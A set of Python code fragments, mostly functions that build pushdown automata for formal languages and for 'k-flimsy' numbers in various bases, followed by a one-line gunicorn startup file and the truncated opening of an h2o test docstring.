        ('q_0', '', 'Z'): [('q_1', 'Z')],
        ('q_0', '', 'a'): [('q_1', 'a')],
        ('q_0', '', 'b'): [('q_1', 'b')],
        # Pop phase; popping 'Z' moves to the final state q_2.
        ('q_1', 'a', 'a'): [('q_1', '')],
        ('q_1', 'b', 'b'): [('q_1', '')],
        ('q_1', '', 'Z'): [('q_2', '')]
    }
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_an_bn_PDA():
    """PDA for { a^n b^n : n >= 0 }.

    Pushes one 'a' per a read; the first b pops an 'a' and moves to 'END',
    where each further b pops one more; the ('S', '', 'Z') move accepts the
    empty string.
    """
    states = {'S', 'END'}
    alphabet = {'', 'a', 'b'}
    stack_alphabet = {'Z', 'a'}
    start_state = 'S'
    start_stack = 'Z'
    transitions = {
        ('S', '', 'Z'): [('END', '')],       # empty input
        ('S', 'a', 'Z'): [('S', 'aZ')],      # count a's on the stack
        ('S', 'a', 'a'): [('S', 'aa')],
        ('S', 'b', 'a'): [('END', '')],      # first b starts the pop phase
        ('END', '', 'Z'): [('END', '')],     # drop the bottom marker
        ('END', 'b', 'a'): [('END', '')]     # one pop per remaining b
    }
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_equal_as_bs_PDA():
    """PDA for strings with equally many a's and b's (in any order).

    The stack always holds the current surplus letter: reading the same
    letter pushes another copy, reading the opposite letter cancels one.
    """
    states = {'S', 'END'}
    alphabet = {'', 'a', 'b'}
    stack_alphabet = {'Z', 'a', 'b'}
    start_state = 'S'
    start_stack = 'Z'
    transitions = {
        ('S', '', 'Z'): [('END', '')],       # balanced: pop the bottom marker
        ('S', 'a', 'Z'): [('S', 'aZ')],
        ('S', 'a', 'a'): [('S', 'aa')],
        ('S', 'a', 'b'): [('S', '')],        # an a cancels a surplus b
        ('S', 'b', 'Z'): [('S', 'bZ')],
        ('S', 'b', 'a'): [('S', '')],        # a b cancels a surplus a
        ('S', 'b', 'b'): [('S', 'bb')]
    }
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_dyck_PDA():  # TODO: Test this
    """PDA for the Dyck language of balanced parentheses.

    Pushes one '(' per opening paren, pops one per closing paren, and
    accepts by popping the bottom marker when the stack is balanced.
    """
    states = {'S', 'END'}
    alphabet = {'', '(', ')'}
    stack_alphabet = {'Z', '('}
    start_state = 'S'
    start_stack = 'Z'
    transitions = {
        ('S', '(', 'Z'): [('S', '(Z')],
        ('S', '(', '('): [('S', '((')],
        ('S', ')', '('): [('S', '')],
        ('S', '', 'Z'): [('END', '')]
    }
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
# For the language a^m b^n c^m
def create_am_bn_cm_PDA():
    """PDA for { a^m b^n c^m }: push one 'X'-like 'a' per a in q_0, pass over
    the b's in q_1, pop one 'a' per c in q_2.  The epsilon moves that pop 'Z'
    in q_0/q_1/q_2 handle the m = 0 and end-of-input cases.
    """
    states = {'q_0', 'q_1', 'q_2'}
    alphabet = {'', 'a', 'b', 'c'}
    stack_alphabet = {'Z', 'a'}
    start_state = 'q_0'
    start_stack = 'Z'
    transitions = {
        ('q_0', 'a', 'Z'): [('q_0', 'aZ')],
        ('q_0', 'a', 'a'): [('q_0', 'aa')],
        ('q_0', '', 'Z'): [('q_0', '')],
        ('q_0', 'b', 'Z'): [('q_1', 'Z')],
        ('q_0', 'b', 'a'): [('q_1', 'a')],
        ('q_0', 'c', 'a'): [('q_2', '')],
        ('q_1', 'b', 'Z'): [('q_1', 'Z')],
        ('q_1', 'b', 'a'): [('q_1', 'a')],
        ('q_1', '', 'Z'): [('q_1', '')],
        ('q_1', 'c', 'a'): [('q_2', '')],
        ('q_2', 'c', 'a'): [('q_2', '')],
        ('q_2', '', 'Z'): [('q_2', '')],
    }
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
# Create a PDA to accept all 3-flimsy binary numbers
def create_3flimsy_PDA():
    """PDA accepting binary representations of 3-flimsy n, i.e. numbers with
    s_2(n) > s_2(3*n) (see the commented-out is_k_flimsy above).

    NOTE(review): the '+c'/'-c' state names appear to encode the carry c of
    the multiply-by-3 computation together with the sign of the running
    bit-count balance, with the stack height tracking its magnitude —
    inferred from the generalized create_flimsy_PDA below; confirm.
    """
    states = {'-0', '-1', '-2', '+2', '+1', '+0', 'END'}
    alphabet = {'0', '1', ''}
    stack_alphabet = {'Z', 'X'}
    start_state = '-0'
    start_stack = 'Z'
    transitions = {
        ('-0', '0', 'Z'): [('-0', 'Z')],
        ('-0', '0', 'X'): [('-0', 'X')],
        ('-0', '1', 'Z'): [('-1', 'Z')],
        ('-0', '1', 'X'): [('-1', 'X')],
        ('-1', '0', 'Z'): [('-0', 'XZ')],
        ('-1', '0', 'X'): [('-0', 'XX')],
        ('-1', '1', 'Z'): [('+2', 'Z')],
        ('-1', '1', 'X'): [('-2', '')],
        ('-2', '0', 'Z'): [('-1', 'Z')],
        ('-2', '0', 'X'): [('-1', 'X')],
        ('-2', '1', 'Z'): [('-2', 'Z')],
        ('-2', '1', 'X'): [('-2', 'X')],
        ('+2', '0', 'Z'): [('+1', 'Z')],
        ('+2', '0', 'X'): [('+1', 'X')],
        ('+2', '1', 'Z'): [('+2', 'Z')],
        ('+2', '1', 'X'): [('+2', 'X'), ('END', '')],
        ('+1', '0', 'Z'): [('-0', 'Z')],
        ('+1', '0', 'X'): [('+0', '')],
        ('+1', '1', 'Z'): [('+2', 'XZ'), ('END', '')],
        ('+1', '1', 'X'): [('+2', 'XX'), ('END', '')],
        ('+0', '0', 'Z'): [('+0', 'Z')],
        ('+0', '0', 'X'): [('+0', 'X')],
        ('+0', '1', 'Z'): [('+1', 'Z')],
        ('+0', '1', 'X'): [('+1', 'X'), ('END', '')],
        # END drains whatever remains on the stack.
        ('END', '', 'Z'): [('END', '')],
        ('END', '', 'X'): [('END', '')]
    }
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_3flimsy_PDA_alternate():
    """Variant of create_3flimsy_PDA with two END states.

    Entering END_1 keeps the X that triggered the move and must pop it via
    the (END_1, '', 'X') transition; END_0 then drains the rest of the stack.
    """
    states = {'-0', '-1', '-2', '+2', '+1', '+0', 'END_0', 'END_1'}
    alphabet = {'0', '1', ''}
    stack_alphabet = {'Z', 'X'}
    start_state = '-0'
    start_stack = 'Z'
    transitions = {
        ('-0', '0', 'Z'): [('-0', 'Z')],
        ('-0', '0', 'X'): [('-0', 'X')],
        ('-0', '1', 'Z'): [('-1', 'Z')],
        ('-0', '1', 'X'): [('-1', 'X')],
        ('-1', '0', 'Z'): [('-0', 'XZ')],
        ('-1', '0', 'X'): [('-0', 'XX')],
        ('-1', '1', 'Z'): [('+2', 'Z')],
        ('-1', '1', 'X'): [('-2', '')],
        ('-2', '0', 'Z'): [('-1', 'Z')],
        ('-2', '0', 'X'): [('-1', 'X')],
        ('-2', '1', 'Z'): [('-2', 'Z')],
        ('-2', '1', 'X'): [('-2', 'X')],
        ('+2', '0', 'Z'): [('+1', 'Z')],
        ('+2', '0', 'X'): [('+1', 'X')],
        ('+2', '1', 'Z'): [('+2', 'Z')],
        ('+2', '1', 'X'): [('+2', 'X'), ('END_1', 'X')],
        ('+1', '0', 'Z'): [('-0', 'Z')],
        ('+1', '0', 'X'): [('+0', '')],
        ('+1', '1', 'Z'): [('+2', 'XZ'), ('END_0', 'Z')],
        ('+1', '1', 'X'): [('+2', 'XX'), ('END_0', 'X')],
        ('+0', '0', 'Z'): [('+0', 'Z')],
        ('+0', '0', 'X'): [('+0', 'X')],
        ('+0', '1', 'Z'): [('+1', 'Z')],
        ('+0', '1', 'X'): [('+1', 'X'), ('END_1', 'X')],
        # END_1 must pop one X; END_0 drains the rest of the stack.
        ('END_0', '', 'Z'): [('END_0', '')],
        ('END_0', '', 'X'): [('END_0', '')],
        ('END_1', '', 'X'): [('END_0', '')]
    }
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_3equal_PDA():
    """PDA accepting binary n with equal binary digit sums for n and 3*n
    (k = 3 case of create_k_equal_PDA below — presumably; confirm).

    Same carry/sign structure as create_3flimsy_PDA, but the END_0 moves
    fire only when the stack is at the bottom marker, i.e. the bit-count
    balance is zero.
    """
    states = {'-0', '-1', '-2', '+2', '+1', '+0', 'END_0'}
    alphabet = {'0', '1', ''}
    stack_alphabet = {'Z', 'X'}
    start_state = '-0'
    start_stack = 'Z'
    transitions = {
        ('-0', '0', 'Z'): [('-0', 'Z')],
        ('-0', '0', 'X'): [('-0', 'X')],
        ('-0', '1', 'Z'): [('-1', 'Z')],
        ('-0', '1', 'X'): [('-1', 'X')],
        ('-1', '0', 'Z'): [('-0', 'XZ')],
        ('-1', '0', 'X'): [('-0', 'XX')],
        ('-1', '1', 'Z'): [('+2', 'Z'), ('END_0', '')],
        ('-1', '1', 'X'): [('-2', '')],
        ('-2', '0', 'Z'): [('-1', 'Z')],
        ('-2', '0', 'X'): [('-1', 'X')],
        ('-2', '1', 'Z'): [('-2', 'Z')],
        ('-2', '1', 'X'): [('-2', 'X')],
        ('+2', '0', 'Z'): [('+1', 'Z')],
        ('+2', '0', 'X'): [('+1', 'X')],
        ('+2', '1', 'Z'): [('+2', 'Z'), ('END_0', '')],
        ('+2', '1', 'X'): [('+2', 'X')],
        ('+1', '0', 'Z'): [('-0', 'Z')],
        ('+1', '0', 'X'): [('+0', '')],
        ('+1', '1', 'Z'): [('+2', 'XZ')],
        ('+1', '1', 'X'): [('+2', 'XX')],
        ('+0', '0', 'Z'): [('+0', 'Z')],
        ('+0', '0', 'X'): [('+0', 'X')],
        ('+0', '1', 'Z'): [('+1', 'Z'), ('END_0', '')],
        ('+0', '1', 'X'): [('+1', 'X')]
    }
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_5equal_PDA():
    """PDA accepting binary n with equal binary digit sums for n and 5*n
    (k = 5 analogue of create_3equal_PDA — presumably; confirm).

    Carries now range over 0..4, hence states -0..-4 / +0..+4; END_1 pops a
    final X before END_0 drops the bottom marker.
    """
    states = {'-0', '-1', '-2', '-3', '-4', '+4', '+3', '+2', '+1', '+0', 'END_0', 'END_1'}
    alphabet = {'0', '1', ''}
    stack_alphabet = {'Z', 'X'}
    start_state = '-0'
    start_stack = 'Z'
    transitions = {
        ('+0', '0', 'X'): [('+0', 'X')],
        ('+0', '0', 'Z'): [('+0', 'Z')],
        ('+0', '1', 'X'): [('+2', 'X')],
        ('+0', '1', 'Z'): [('+2', 'Z'), ('END_0', 'Z')],
        ('+1', '0', 'X'): [('+0', '')],
        ('+1', '0', 'Z'): [('-0', 'Z')],
        ('+1', '1', 'X'): [('+3', 'XX')],
        ('+1', '1', 'Z'): [('+3', 'XZ'), ('END_0', 'Z')],
        ('+2', '0', 'X'): [('+1', 'X')],
        ('+2', '0', 'Z'): [('+1', 'Z')],
        ('+2', '1', 'X'): [('+3', 'X'), ('END_1', 'X')],
        ('+2', '1', 'Z'): [('+3', 'Z')],
        ('+3', '0', 'X'): [('+1', '')],
        ('+3', '0', 'Z'): [('-1', 'Z')],
        ('+3', '1', 'X'): [('+4', 'XX')],
        ('+3', '1', 'Z'): [('+4', 'XZ')],
        ('+4', '0', 'X'): [('+2', 'X')],
        ('+4', '0', 'Z'): [('+2', 'Z')],
        ('+4', '1', 'X'): [('+4', 'X')],
        ('+4', '1', 'Z'): [('+4', 'Z'), ('END_0', 'Z')],
        ('-0', '0', 'X'): [('-0', 'X')],
        ('-0', '0', 'Z'): [('-0', 'Z')],
        ('-0', '1', 'X'): [('-2', 'X')],
        ('-0', '1', 'Z'): [('-2', 'Z')],
        ('-1', '0', 'X'): [('-0', 'XX')],
        ('-1', '0', 'Z'): [('-0', 'XZ')],
        ('-1', '1', 'X'): [('-3', '')],
        ('-1', '1', 'Z'): [('+3', 'Z')],
        ('-2', '0', 'X'): [('-1', 'X')],
        ('-2', '0', 'Z'): [('-1', 'Z')],
        ('-2', '1', 'X'): [('-3', 'X')],
        ('-2', '1', 'Z'): [('-3', 'Z')],
        ('-3', '0', 'X'): [('-1', 'XX')],
        ('-3', '0', 'Z'): [('-1', 'XZ')],
        ('-3', '1', 'X'): [('-4', '')],
        ('-3', '1', 'Z'): [('+4', 'Z'), ('END_0', 'Z')],
        ('-4', '0', 'X'): [('-2', 'X')],
        ('-4', '0', 'Z'): [('-2', 'Z')],
        ('-4', '1', 'X'): [('-4', 'X')],
        ('-4', '1', 'Z'): [('-4', 'Z')],
        ('END_0', '', 'Z'): [('END_0', '')],
        ('END_1', '', 'X'): [('END_0', '')]
    }
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
# Create a PDA to accept all k-flimsy binary numbers
def create_flimsy_PDA(k):
    """Build a PDA accepting binary n with s_2(n) > s_2(k*n), for odd k > 1.

    States '-c'/'+c' track the carry c of the multiply-by-k computation; the
    +/- prefix tracks the sign of the running bit-count balance and the
    number of 'X' symbols on the stack tracks its magnitude.  On the final
    '1' of the input, a transition jumps to an END_i state that pops exactly
    the X's still owed for the remaining carry bits.
    """
    assert (type(k) == int) and (k > 1) and (k % 2 == 1)
    states = {'END_0'}
    alphabet = {'0', '1', EMPTY_STRING}
    stack_alphabet = {'Z', 'X'}
    start_state = '-0'
    start_stack = 'Z'
    # END_0 drains the stack to accept.
    transitions = {('END_0', EMPTY_STRING, 'Z'): [('END_0', EMPTY_STRING)],
                   ('END_0', EMPTY_STRING, 'X'): [('END_0', EMPTY_STRING)]}
    # Main states: one +/- pair per possible carry value.
    for carry in range(k):
        s = str(carry)
        states.add('-' + s)
        states.add('+' + s)
        for si in alphabet:
            if si != EMPTY_STRING:
                i = int(si)
                for z in stack_alphabet:
                    # Reading bit i of n: bit of k*n is (i*k + carry) mod 2.
                    added = i * k + carry
                    new_kn_digit = added % 2
                    new_carry = str(added // 2)
                    if new_kn_digit % 2 == i:
                        # Both numbers gain the same bit: balance unchanged.
                        transitions[('-' + s, si, z)] = [('-' + new_carry, z)]
                        transitions[('+' + s, si, z)] = [('+' + new_carry, z)]
                    elif new_kn_digit % 2 == 1:
                        assert (i == 0)  # n goes up by 0, kn goes up by 1
                        transitions[('-' + s, si, z)] = [('-' + new_carry, 'X' + z)]
                        if z == 'X':
                            transitions[('+' + s, si, z)] = [('+' + new_carry, EMPTY_STRING)]
                        else:
                            # Balance crosses zero: flip sign instead of popping.
                            transitions[('+' + s, si, z)] = [('-' + new_carry, z)]
                    else:
                        assert (new_kn_digit % 2 == 0)
                        assert (i == 1)  # n goes up by 1, kn goes up by 0
                        transitions[('+' + s, si, z)] = [('+' + new_carry, 'X' + z)]
                        if z == 'X':
                            transitions[('-' + s, si, z)] = [('-' + new_carry, EMPTY_STRING)]
                        else:
                            transitions[('-' + s, si, z)] = [('+' + new_carry, z)]
    # Add new end states
    # Transitions from END_{i+1} to END_{i} that read nothing but pop an X
    for i in range(int(math.log2(k))):
        new_state = 'END_' + str(i + 1)
        states.add(new_state)
        one_less = 'END_' + str(i)
        transitions[(new_state, EMPTY_STRING, 'X')] = [(one_less, EMPTY_STRING)]
    # 1-transitions that pop nothing from final states to END_x for some x?
    for carry in range(k):
        current_state = '+' + str(carry)
        # Reading the last 1 leaves k + carry still to emit into k*n; its
        # remaining 1-bits (minus the bit just balanced) must be popped.
        required_pops = s_2(k + carry) - 1
        transitions[(current_state, '1', 'X')].append(('END_' + str(required_pops), 'X'))
        if required_pops == 0:
            transitions[(current_state, '1', 'Z')].append(('END_' + str(required_pops), 'Z'))
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
# Create a PDA to accept all n where b(n) = b(kn)
def create_k_equal_PDA(k):
    """Build a PDA accepting binary n with s_2(n) == s_2(k*n), for odd k > 1.

    Same carry/sign construction as create_flimsy_PDA, except acceptance
    requires the bit-count balance to be exactly zero.  The final-'1'
    transitions are derived by simulating the PDA *backwards* from the
    accepting configuration over the suffix '1' + leading zeros.
    """
    assert (type(k) == int) and (k > 1) and (k % 2 == 1)
    states = {'END_0'}
    alphabet = {'0', '1', EMPTY_STRING}
    stack_alphabet = {'Z', 'X'}
    start_state = '-0'
    start_stack = 'Z'
    # Unlike create_flimsy_PDA, END_0 may only pop the bottom marker (balance 0).
    transitions = {('END_0', EMPTY_STRING, 'Z'): [('END_0', EMPTY_STRING)]}
    for carry in range(k):
        s = str(carry)
        states.add('-' + s)
        states.add('+' + s)
        for si in alphabet:
            if si != EMPTY_STRING:
                i = int(si)
                for z in stack_alphabet:
                    # Reading bit i of n: bit of k*n is (i*k + carry) mod 2.
                    added = i * k + carry
                    new_kn_digit = added % 2
                    new_carry = str(added // 2)
                    if new_kn_digit % 2 == i:
                        transitions[('-' + s, si, z)] = [('-' + new_carry, z)]
                        transitions[('+' + s, si, z)] = [('+' + new_carry, z)]
                    elif new_kn_digit % 2 == 1:
                        assert (i == 0)  # n goes up by 0, kn goes up by 1
                        transitions[('-' + s, si, z)] = [('-' + new_carry, 'X' + z)]
                        if z == 'X':
                            transitions[('+' + s, si, z)] = [('+' + new_carry, EMPTY_STRING)]
                        else:
                            transitions[('+' + s, si, z)] = [('-' + new_carry, z)]
                    else:
                        assert (new_kn_digit % 2 == 0)
                        assert (i == 1)  # n goes up by 1, kn goes up by 0
                        transitions[('+' + s, si, z)] = [('+' + new_carry, 'X' + z)]
                        if z == 'X':
                            transitions[('-' + s, si, z)] = [('-' + new_carry, EMPTY_STRING)]
                        else:
                            transitions[('-' + s, si, z)] = [('+' + new_carry, z)]
    # Add new end states
    # Transitions from END_{i+1} to END_{i} that read nothing but pop an X
    for i in range(int(math.log2(k))):
        new_state = 'END_' + str(i + 1)
        states.add(new_state)
        one_less = 'END_' + str(i)
        transitions[(new_state, EMPTY_STRING, 'X')] = [(one_less, EMPTY_STRING)]
    # 1-transitions that pop Z (stack bottom) from stack iff reading 100000... would leave PDA at -0 with empty stack
    b = math.floor(math.log2(k)) + 1
    pda_states = {(start_state,
                   start_stack)}  # working backwards from the state we want to get to, simulating reading last 1 plus leading zeros
    for letter in ('0' * b + '1'):
        temp = set()
        for (state, stack) in pda_states:
            # for all (q, S) such that ((state, stack_top) in transitions[(q, letter, S)])
            # temp.add((q, S))
            assert (len(stack) > 0)
            for (q, let, S) in transitions:
                if let == letter:
                    destinations = transitions[(q, letter, S)]
                    if (state, stack[-1]) in destinations:  # no push or pop
                        new_stack = stack[:-1] + S
                        temp.add((q, new_stack))
                    if (state, EMPTY_STRING) in destinations:  # pop
                        new_stack = stack + S
                        temp.add((q, new_stack))
                    if (len(stack) > 1) and ((state, stack[-2] + 'X') in destinations):  # push
                        new_stack = stack[:-2] + S
                        temp.add((q, new_stack))
        pda_states = temp
    for (state, stack) in pda_states:
        assert (len(stack) > 0)
        stack_top = stack[-1]
        required_pops = len(stack) - 1
        # Add transition (to transitions) from $state to END by popping $stack_height
        transitions[(state, '1', stack_top)].append(('END_' + str(required_pops), stack_top))
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
# Create a PDA to accept all 2-flimsy ternary numbers
# (the previous comment said "3-flimsy binary" — stale copy-paste; the
# function builds the base-3, k=2 machine.)
def create_2_flimsy_ternary_PDA():
    """PDA accepting ternary representations of n with s_3(n) > s_3(2*n)
    (presumably, by analogy with create_base_b_k_flimsy_PDA below — confirm).

    States '-c'/'+c' carry the multiply-by-2 carry in base 3; END_1 pops the
    triggering X before END_0 drains the stack.
    """
    states = {'-0', '-1', '+1', '+0', 'END_0', 'END_1'}
    alphabet = {'0', '1', '2', ''}
    stack_alphabet = {'Z', 'X'}
    start_state = '-0'
    start_stack = 'Z'
    transitions = {
        ('-0', '0', 'Z'): [('-0', 'Z')],
        ('-0', '0', 'X'): [('-0', 'X')],
        ('-0', '1', 'Z'): [('-0', 'XZ')],
        ('-0', '1', 'X'): [('-0', 'XX')],
        ('-0', '2', 'Z'): [('+1', 'Z')],
        ('-0', '2', 'X'): [('-1', '')],
        ('-1', '0', 'Z'): [('-0', 'XZ')],
        ('-1', '0', 'X'): [('-0', 'XX')],
        ('-1', '1', 'Z'): [('+1', 'Z')],
        ('-1', '1', 'X'): [('-1', '')],
        ('-1', '2', 'Z'): [('-1', 'Z')],
        ('-1', '2', 'X'): [('-1', 'X')],
        ('+0', '0', 'Z'): [('+0', 'Z')],
        ('+0', '0', 'X'): [('+0', 'X')],
        ('+0', '1', 'Z'): [('-0', 'Z')],
        ('+0', '1', 'X'): [('+0', ''), ('END_1', 'X')],
        ('+0', '2', 'Z'): [('+1', 'XZ'), ('END_0', 'Z')],
        ('+0', '2', 'X'): [('+1', 'XX'), ('END_0', 'X')],
        ('+1', '0', 'Z'): [('-0', 'Z')],
        ('+1', '0', 'X'): [('+0', '')],
        ('+1', '1', 'Z'): [('+1', 'XZ'), ('END_0', 'Z')],
        ('+1', '1', 'X'): [('+1', 'XX'), ('END_0', 'X')],
        ('+1', '2', 'Z'): [('+1', 'Z')],
        ('+1', '2', 'X'): [('+1', 'X'), ('END_1', 'X')],
        ('END_1', '', 'X'): [('END_0', '')],
        ('END_0', '', 'Z'): [('END_0', '')],
        ('END_0', '', 'X'): [('END_0', '')]
    }
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def _char_to_int(c):  # Get integer from generalized ASCII number
    # '0' -> 0 ... '9' -> 9, continuing past '9' for bases above 10.
    return ord(c) - ord('0')
def _int_to_char(i):  # Get ASCII character for given number
    # Inverse of _char_to_int: 0 -> '0' ... 9 -> '9', then ':' for 10, etc.
    return chr(ord('0') + i)
def _create_flimsy_transitions(states: set, transitions: dict, stack_change: int, old_carry: str, new_carry: str, read_char: str):
    """Add transitions from carry *old_carry* to *new_carry* on *read_char*,
    changing the stack height by *stack_change*.

    The '+'/'-' state prefix tracks the sign of the running digit-sum balance,
    so a push on '+' states corresponds to a pop on '-' states and vice versa;
    crossing zero flips the sign instead of popping past the 'Z' bottom marker.
    For |stack_change| > 1, chains of intermediate push_/pop_ states perform
    one stack operation each on epsilon input; the early ``return`` when both
    intermediates already exist avoids re-adding a chain built by an earlier
    call.  Mutates *states* and *transitions* in place.
    """
    if stack_change == 0:
        transitions[('-' + old_carry, read_char, 'Z')] = [('-' + new_carry, 'Z')]
        transitions[('-' + old_carry, read_char, 'X')] = [('-' + new_carry, 'X')]
        transitions[('+' + old_carry, read_char, 'Z')] = [('+' + new_carry, 'Z')]
        transitions[('+' + old_carry, read_char, 'X')] = [('+' + new_carry, 'X')]
    elif stack_change == 1:
        transitions[('+' + old_carry, read_char, 'Z')] = [('+' + new_carry, 'XZ')]
        transitions[('+' + old_carry, read_char, 'X')] = [('+' + new_carry, 'XX')]
        transitions[('-' + old_carry, read_char, 'Z')] = [('+' + new_carry, 'Z')]  # balance crosses zero
        transitions[('-' + old_carry, read_char, 'X')] = [('-' + new_carry, EMPTY_STRING)]
    elif stack_change == -1:
        transitions[('-' + old_carry, read_char, 'Z')] = [('-' + new_carry, 'XZ')]
        transitions[('-' + old_carry, read_char, 'X')] = [('-' + new_carry, 'XX')]
        transitions[('+' + old_carry, read_char, 'Z')] = [('-' + new_carry, 'Z')]  # balance crosses zero
        transitions[('+' + old_carry, read_char, 'X')] = [('+' + new_carry, EMPTY_STRING)]
    elif stack_change > 1:
        current_state_plus = '+' + old_carry
        current_state_minus = '-' + old_carry
        while stack_change > 1:
            stack_change -= 1
            intermediate_state_plus = 'push_' + str(stack_change) + '_to_+' + new_carry
            intermediate_state_minus = 'pop_' + str(stack_change) + '_to_-' + new_carry
            transitions[(current_state_plus, read_char, 'Z')] = [(intermediate_state_plus, 'XZ')]
            transitions[(current_state_plus, read_char, 'X')] = [(intermediate_state_plus, 'XX')]
            transitions[(current_state_minus, read_char, 'Z')] = [(intermediate_state_plus, 'Z')]
            transitions[(current_state_minus, read_char, 'X')] = [(intermediate_state_minus, EMPTY_STRING)]
            if intermediate_state_plus in states and intermediate_state_minus in states:
                # Chain already built by an earlier call; stop here.
                return
            states.add(intermediate_state_plus)
            states.add(intermediate_state_minus)
            current_state_plus = intermediate_state_plus
            current_state_minus = intermediate_state_minus
            read_char = EMPTY_STRING  # remaining links consume no input
        final_state_plus = '+' + new_carry
        final_state_minus = '-' + new_carry
        transitions[(current_state_plus, read_char, 'Z')] = [(final_state_plus, 'XZ')]
        transitions[(current_state_plus, read_char, 'X')] = [(final_state_plus, 'XX')]
        transitions[(current_state_minus, read_char, 'Z')] = [(final_state_plus, 'Z')]
        transitions[(current_state_minus, read_char, 'X')] = [(final_state_minus, EMPTY_STRING)]
    elif stack_change < -1:
        # Mirror image of the > 1 case with the +/- roles swapped.
        current_state_plus = '+' + old_carry
        current_state_minus = '-' + old_carry
        while stack_change < -1:
            stack_change += 1
            intermediate_state_plus = 'pop_' + str(-stack_change) + '_to_+' + new_carry
            intermediate_state_minus = 'push_' + str(-stack_change) + '_to_-' + new_carry
            transitions[(current_state_minus, read_char, 'Z')] = [(intermediate_state_minus, 'XZ')]
            transitions[(current_state_minus, read_char, 'X')] = [(intermediate_state_minus, 'XX')]
            transitions[(current_state_plus, read_char, 'Z')] = [(intermediate_state_minus, 'Z')]
            transitions[(current_state_plus, read_char, 'X')] = [(intermediate_state_plus, EMPTY_STRING)]
            if intermediate_state_plus in states and intermediate_state_minus in states:
                return
            states.add(intermediate_state_plus)
            states.add(intermediate_state_minus)
            current_state_plus = intermediate_state_plus
            current_state_minus = intermediate_state_minus
            read_char = EMPTY_STRING
        final_state_plus = '+' + new_carry
        final_state_minus = '-' + new_carry
        transitions[(current_state_minus, read_char, 'Z')] = [(final_state_minus, 'XZ')]
        transitions[(current_state_minus, read_char, 'X')] = [(final_state_minus, 'XX')]
        transitions[(current_state_plus, read_char, 'Z')] = [(final_state_minus, 'Z')]
        transitions[(current_state_plus, read_char, 'X')] = [(final_state_plus, EMPTY_STRING)]
# Create a PDA to accept all k-flimsy binary numbers
def create_base_b_k_flimsy_PDA(b, k):
    """Create a PDA that accepts all base-b k-flimsy numbers.

    :param b: number base, must be an int > 1
    :param k: multiplier, must be an int >= 1
    :return: PDA object built from the computed states/transitions
    """
    assert (type(k) == int) and (type(b) == int) and (k >= 1) and (b > 1)
    # strip factors of b out of k: multiplying by b only appends a 0 digit,
    # so it cannot affect flimsiness
    while k % b == 0:
        k //= b
    states = {'END'}
    alphabet = {EMPTY_STRING}
    for i in range(b):
        alphabet.add(_int_to_char(i))
    stack_alphabet = {'Z', 'X'}  # Z = bottom-of-stack marker, X = unary counter
    start_state = '-0'
    start_stack = 'Z'
    transitions = {('END', EMPTY_STRING, 'Z'): [('END', EMPTY_STRING)],
                   ('END', EMPTY_STRING, 'X'): [('END', EMPTY_STRING)]}
    # Add END states, to pop at least/most i X's off the stack before reaching END
    # Transitions from END_{i+1} to END_{i} that read nothing but pop an X
    states.add('pop_at_most_0_to_END')
    transitions[('pop_at_most_0_to_END', EMPTY_STRING, 'Z')] = [('END', EMPTY_STRING)]
    for i in range(int(2*(b-1)*math.log(k+1, b) + 0.01)+1):  # TODO: confirm this bound
        new_state = 'pop_at_least_' + str(i + 1) + '_to_END'
        one_less = 'END' if i == 0 else ('pop_at_least_' + str(i) + '_to_END')
        states.add(new_state)
        transitions[(new_state, EMPTY_STRING, 'X')] = [(one_less, EMPTY_STRING)]
        new_state = 'pop_at_most_' + str(i + 1) + '_to_END'
        one_less = 'pop_at_most_' + str(i) + '_to_END'
        states.add(new_state)
        transitions[(new_state, EMPTY_STRING, 'Z')] = [('END', EMPTY_STRING)]
        transitions[(new_state, EMPTY_STRING, 'X')] = [(one_less, EMPTY_STRING)]
    # Add main states (+/- carry)
    # Transitions between those states based on reading non-final input chars
    for carry in range(k):
        s = _int_to_char(carry)
        states.add('-' + s)
        states.add('+' + s)
        for si in alphabet:
            if si != EMPTY_STRING:
                i = _char_to_int(si)
                added = i * k + carry
                new_kn_digit = added % b
                new_carry = _int_to_char(added // b)
                stack_change = i - new_kn_digit  # if positive, push on + state and pop on - state; else vice versa
                _create_flimsy_transitions(states, transitions, stack_change, s, new_carry, si)
    # nonzero-transitions that pop nothing from final (sign, carry) states to END_i state
    for carry in range(k):
        for read_char in alphabet:
            if read_char != EMPTY_STRING and read_char != '0':
                read_digit = _char_to_int(read_char)
                plus_state = '+' + _int_to_char(carry)
                min_required_pops = s_b(k*read_digit + carry, b) - read_digit
                if min_required_pops > 0:
                    transitions[(plus_state, read_char, 'X')].append(('pop_at_least_' + str(min_required_pops) + '_to_END', 'X'))
                    if not ('pop_at_least_' + str(min_required_pops) + '_to_END') in states:
                        print("MISSING POP AT LEAST", min_required_pops, "state")
                        assert False
                else:
                    transitions[(plus_state, read_char, 'Z')].append(('END', 'Z'))
                    transitions[(plus_state, read_char, 'X')].append(('END', 'X'))
                minus_state = '-' + _int_to_char(carry)
                max_required_pops = read_digit - s_b(k*read_digit + carry, b) - 1
                if max_required_pops >= 0:
                    transitions[(minus_state, read_char, 'Z')].append(('END', 'Z'))
                    for i in range(1, max_required_pops + 1):
                        transitions[(minus_state, read_char, 'X')].append(('pop_at_most_' + str(i) + '_to_END', 'X'))
                        if not ('pop_at_most_' + str(i) + '_to_END') in states:
                            # BUG FIX: this diagnostic previously printed min_required_pops,
                            # which is the unrelated value from the plus-state branch; the
                            # state that is actually missing is 'pop_at_most_<i>_to_END'
                            print("MISSING POP AT MOST", i, "state")
                            assert False
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
|
# startup.py
# points gunicorn at our main.py within the src/app directory
from src.app.main import app
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
Test h2o initialization / startup options.
Currently, our R/Python test suite is executed against an established h2o cluster (run.py sets up the cluster).
However, we ignore the mode of operation where the h2o cluster is created by the client. Consequently, we may not
